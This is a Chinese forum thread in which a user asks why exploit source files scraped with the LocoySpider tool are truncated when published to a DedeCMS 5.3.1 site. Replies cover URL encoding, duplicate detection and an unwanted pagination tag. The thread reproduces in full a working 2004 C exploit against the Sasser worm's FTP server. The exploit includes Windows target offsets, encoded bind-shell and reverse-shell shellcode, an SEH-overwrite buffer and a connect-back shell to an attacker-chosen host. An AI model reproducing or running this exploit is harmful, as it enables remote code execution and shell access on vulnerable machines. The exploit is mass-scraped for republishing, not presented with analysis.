关于采集和在线发布的致命问题。

100298

刚刚接触火车头，我采集了一些 Exploit 源码文件，在火车头里面看是完整的，也是没有问题的。

可是为什么我在线发布到网站以后发现内容部完整呢？？有些只发布进去了十几个字节，有的稍微能多点。

不过基本上没有多少是完整的。（应该不是内容太长的缘故）

第一个代码内容是我发布到我的网站的内容，是发布到 DedeCMS 5.3.1 的内容。

1. 
   
2. /*
   
3.   _________ / ___// ____/ ____/
   
4. / ___/ __ \\__ \/ __/ / /
   
5. / /  / /_/ /__/ / /___/ /___
   
6. /_/   \____/____/_____/\____/
   
7. 
   
8. - ROMANIAN SECURITY RESEARCH 2004 -
   
9. 
   
10. 
    
11. sasser v[a-e] exploit (of its ftpd server)
    
12. 
    
13. exploit version 1.4, public
    
14. 
    
15. author:  mandragore
    
16. date:  Mon May 10 16:13:31     2004
    
17. vuln type: SEH ptr overwriting
    
18. greets:  rosecurity team
    
19. discovery: edcba
    
20. note:  sasser.e has its ftpd on port 1023
    
21. update:  offsets
    
22. 
    
23. */
    
24. 
    
25. #include
    

复制代码

下面的是原文

1. 
   
2. /*
   
3. _________ / ___// ____/ ____/
   
4. / ___/ __ \\__ \/ __/ / /
   
5. / / / /_/ /__/ / /___/ /___
   
6. /_/ \____/____/_____/\____/
   
7. 
   
8. - ROMANIAN SECURITY RESEARCH 2004 -
   
9. 
   
10. 
    
11. sasser v[a-e] exploit (of its ftpd server)
    
12. 
    
13. exploit version 1.4, public
    
14. 
    
15. author: mandragore
    
16. date: Mon May 10 16:13:31 2004
    
17. vuln type: SEH ptr overwriting
    
18. greets: rosecurity team
    
19. discovery: edcba
    
20. note: sasser.e has its ftpd on port 1023
    
21. update: offsets
    
22. 
    
23. */
    
24. 
    
25. #include <stdio.h>
    
26. #include <strings.h>
    
27. #include <signal.h>
    
28. #include <netinet/in.h>
    
29. #include <netdb.h>
    
30. 
    
31. #define NORM "\033[00;00m"
    
32. #define GREEN "\033[01;32m"
    
33. #define YELL "\033[01;33m"
    
34. #define RED "\033[01;31m"
    
35. 
    
36. #define BANNER GREEN "[%%] " YELL "mandragore&#39;s sploit v1.4 for " RED "sasser.x" NORM
    
37. 
    
38. #define fatal(x) { perror(x); exit(1); }
    
39. 
    
40. #define default_port 5554
    
41. 
    
42. struct { char *os; long goreg; long gpa; long lla;}
    
43. targets[] = {
    
44. // { "os", pop pop ret, GetProcAd ptr, LoadLib ptr },
    
45. { "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll&#39;s
    
46. { "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 },
    
47. { "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 },
    
48. }, tsz;
    
49. 
    
50. unsigned char bsh[]={
    
51. 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
    
52. 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
    
53. 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
    
54. 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
    
55. 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
    
56. 0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
    
57. 0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
    
58. 0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
    
59. 0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
    
60. 0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
    
61. 0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
    
62. 0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
    
63. 0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
    
64. 0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
    
65. 0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
    
66. 0xC8,0x21,0x0E
    
67. };
    
68. 
    
69. unsigned char rsh[]={
    
70. 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
    
71. 0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
    
72. 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
    
73. 0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
    
74. 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
    
75. 0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
    
76. 0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
    
77. 0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
    
78. 0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
    
79. 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
    
80. 0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
    
81. 0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
    
82. 0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
    
83. };
    
84. 
    
85. char verbose=0;
    
86. 
    
87. void setoff(long GPA, long LLA) {
    
88. int gpa=GPA^0xdededede, lla=LLA^0xdededede;
    
89. memcpy(bsh+0x1d,&gpa,4);
    
90. memcpy(bsh+0x2e,&lla,4);
    
91. memcpy(rsh+0x1d,&gpa,4);
    
92. memcpy(rsh+0x2e,&lla,4);
    
93. }
    
94. 
    
95. void usage(char *argv0) {
    
96. int i;
    
97. 
    
98. printf("%s -d <host/ip> [opts]\n\n",argv0);
    
99. 
    
100. printf("Options:\n");
     
101. printf(" -h undocumented\n");
     
102. printf(" -p <port> to connect to [default: %u]\n",default_port);
     
103. printf(" -s <&#39;bind&#39;/&#39;rev&#39;> shellcode type [default: bind]\n");
     
104. printf(" -P <port> for the shellcode [default: 5300]\n");
     
105. printf(" -H <host/ip> for the reverse shellcode\n");
     
106. printf(" -L setup the listener for the reverse shell\n");
     
107. printf(" -t <target type> [default 0]; choose below\n\n");
     
108. 
     
109. printf("Types:\n");
     
110. for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)
     
111. printf(" %d %s\t[0x%.8x]\n", i, targets[i].os, targets[i].goreg);
     
112. 
     
113. exit(1);
     
114. }
     
115. 
     
116. void shell(int s) {
     
117. char buff[4096];
     
118. int retval;
     
119. fd_set fds;
     
120. 
     
121. printf("[+] connected!\n\n");
     
122. 
     
123. for (;;) {
     
124. FD_ZERO(&fds);
     
125. FD_SET(0,&fds);
     
126. FD_SET(s,&fds);
     
127. 
     
128. if (select(s+1, &fds, NULL, NULL, NULL) < 0)
     
129. fatal("[-] shell.select()");
     
130. 
     
131. if (FD_ISSET(0,&fds)) {
     
132. if ((retval = read(1,buff,4096)) < 1)
     
133. fatal("[-] shell.recv(stdin)");
     
134. send(s,buff,retval,0);
     
135. }
     
136. 
     
137. if (FD_ISSET(s,&fds)) {
     
138. if ((retval = recv(s,buff,4096,0)) < 1)
     
139. fatal("[-] shell.recv(socket)");
     
140. write(1,buff,retval);
     
141. }
     
142. }
     
143. }
     
144. 
     
145. void callback(short port) {
     
146. struct sockaddr_in sin;
     
147. int s,slen=16;
     
148. 
     
149. sin.sin_family = 2;
     
150. sin.sin_addr.s_addr = 0;
     
151. sin.sin_port = htons(port);
     
152. 
     
153. s=socket(2,1,6);
     
154. 
     
155. if ( bind(s,(struct sockaddr *)&sin, 16) ) {
     
156. kill(getppid(),SIGKILL);
     
157. fatal("[-] shell.bind");
     
158. }
     
159. 
     
160. listen(s,1);
     
161. 
     
162. s=accept(s,(struct sockaddr *)&sin,&slen);
     
163. 
     
164. shell(s);
     
165. printf("crap\n");
     
166. }
     
167. 
     
168. int main(int argc, char **argv, char **env) {
     
169. struct sockaddr_in sin;
     
170. struct hostent *he;
     
171. char *host; int port=default_port;
     
172. char *Host; int Port=5300; char bindopt=1;
     
173. int i,s,pid=0,rip;
     
174. char *buff;
     
175. int type=0;
     
176. char *jmp[]={"\xeb\x06","\xe9\x13\xfc\xff\xff"};
     
177. 
     
178. printf(BANNER "\n");
     
179. 
     
180. if (argc==1)
     
181. usage(argv[0]);
     
182. 
     
183. for (i=1;i<argc;i+=2) {
     
184. if (strlen(argv[i]) != 2)
     
185. usage(argv[0]);
     
186. 
     
187. switch(argv[i][1]) {
     
188. case &#39;t&#39;:
     
189. type=atoi(argv[i+1]);
     
190. break;
     
191. case &#39;d&#39;:
     
192. host=argv[i+1];
     
193. break;
     
194. case &#39;p&#39;:
     
195. port=atoi(argv[i+1])?:default_port;
     
196. break;
     
197. case &#39;s&#39;:
     
198. if (strstr(argv[i+1],"rev"))
     
199. bindopt=0;
     
200. break;
     
201. case &#39;H&#39;:
     
202. Host=argv[i+1];
     
203. break;
     
204. case &#39;P&#39;:
     
205. Port=atoi(argv[i+1])?:5300;
     
206. Port=Port ^ 0xdede;
     
207. Port=(Port & 0xff) << 8 | Port >>8;
     
208. memcpy(bsh+0x57,&Port,2);
     
209. memcpy(rsh+0x5a,&Port,2);
     
210. Port=Port ^ 0xdede;
     
211. Port=(Port & 0xff) << 8 | Port >>8;
     
212. break;
     
213. case &#39;L&#39;:
     
214. pid++; i--;
     
215. break;
     
216. case &#39;v&#39;:
     
217. verbose++; i--;
     
218. break;
     
219. case &#39;h&#39;:
     
220. usage(argv[0]);
     
221. default:
     
222. usage(argv[0]);
     
223. }
     
224. }
     
225. 
     
226. if (verbose)
     
227. printf("verbose!\n");
     
228. 
     
229. if ((he=gethostbyname(host))==NULL)
     
230. fatal("[-] gethostbyname()");
     
231. 
     
232. sin.sin_family = 2;
     
233. sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
     
234. sin.sin_port = htons(port);
     
235. 
     
236. printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
     
237. if (bindopt)
     
238. printf("[.] will try to put a bindshell on port %d.\n",Port);
     
239. else {
     
240. if ((he=gethostbyname(Host))==NULL)
     
241. fatal("[-] gethostbyname() for -H");
     
242. rip=*((long *)he->h_addr_list[0]);
     
243. rip=rip^0xdededede;
     
244. memcpy(rsh+0x53,&rip,4);
     
245. if (pid) {
     
246. printf("[.] setting up a listener on port %d.\n",Port);
     
247. pid=fork();
     
248. switch (pid) { case 0: callback(Port); }
     
249. } else
     
250. printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr
     
251. *)he->h_addr_list[0])),Port);
     
252. }
     
253. 
     
254. printf("[.] using type &#39;%s&#39;\n",targets[type].os);
     
255. 
     
256. // -------------------- core
     
257. 
     
258. s=socket(2,1,6);
     
259. 
     
260. if (connect(s,(struct sockaddr *)&sin,16)!=0) {
     
261. if (pid) kill(pid,SIGKILL);
     
262. fatal("[-] connect()");
     
263. }
     
264. 
     
265. printf("[+] connected, sending exploit\n");
     
266. 
     
267. buff=(char *)malloc(4096);
     
268. bzero(buff,4096);
     
269. 
     
270. sprintf(buff,"USER x\n");
     
271. send(s,buff,strlen(buff),0);
     
272. recv(s,buff,4095,0);
     
273. sprintf(buff,"PASS x\n");
     
274. send(s,buff,strlen(buff),0);
     
275. recv(s,buff,4095,0);
     
276. 
     
277. memset(buff+0000,0x90,2000);
     
278. strncpy(buff,"PORT ",5);
     
279. strcat(buff,"\x0a");
     
280. memcpy(buff+272,jmp[0],2);
     
281. memcpy(buff+276,&targets[type].goreg,4);
     
282. memcpy(buff+280,jmp[1],5);
     
283. 
     
284. setoff(targets[type].gpa, targets[type].lla);
     
285. 
     
286. if (bindopt)
     
287. memcpy(buff+300,&bsh,strlen(bsh));
     
288. else
     
289. memcpy(buff+300,&rsh,strlen(rsh));
     
290. 
     
291. send(s,buff,strlen(buff),0);
     
292. 
     
293. free(buff);
     
294. 
     
295. close(s);
     
296. 
     
297. // -------------------- end of core
     
298. 
     
299. if (bindopt) {
     
300. sin.sin_port = htons(Port);
     
301. sleep(1);
     
302. s=socket(2,1,6);
     
303. if (connect(s,(struct sockaddr *)&sin,16)!=0)
     
304. fatal("[-] exploit most likely failed");
     
305. shell(s);
     
306. }
     
307. 
     
308. if (pid) wait(&pid);
     
309. 
     
310. exit(0);
     
311. }
     
312. 
     

复制代码

孤魂

试试URLENCODE，感觉这个DEDECMS处理数据包的问题

100298

请问您说的这个在什么地方设置？？

还有就是重复检测好像不是太正常。。

我采集同样的东西，采集了三次，提示了三次重复然后停止了。

可是每次停止的地方都不一样。

100298

谢谢，好像解决了发布问题，不过我再测试测试。

不过发布成功以后，他会在底部加上“#p#分页标题#e#”

这个有什么办法吗？？？

可是采集的内容里面没有 #p#分页标题#e#

100298

我晕。论坛都成这样了？？？一天都没有人回个帖子。。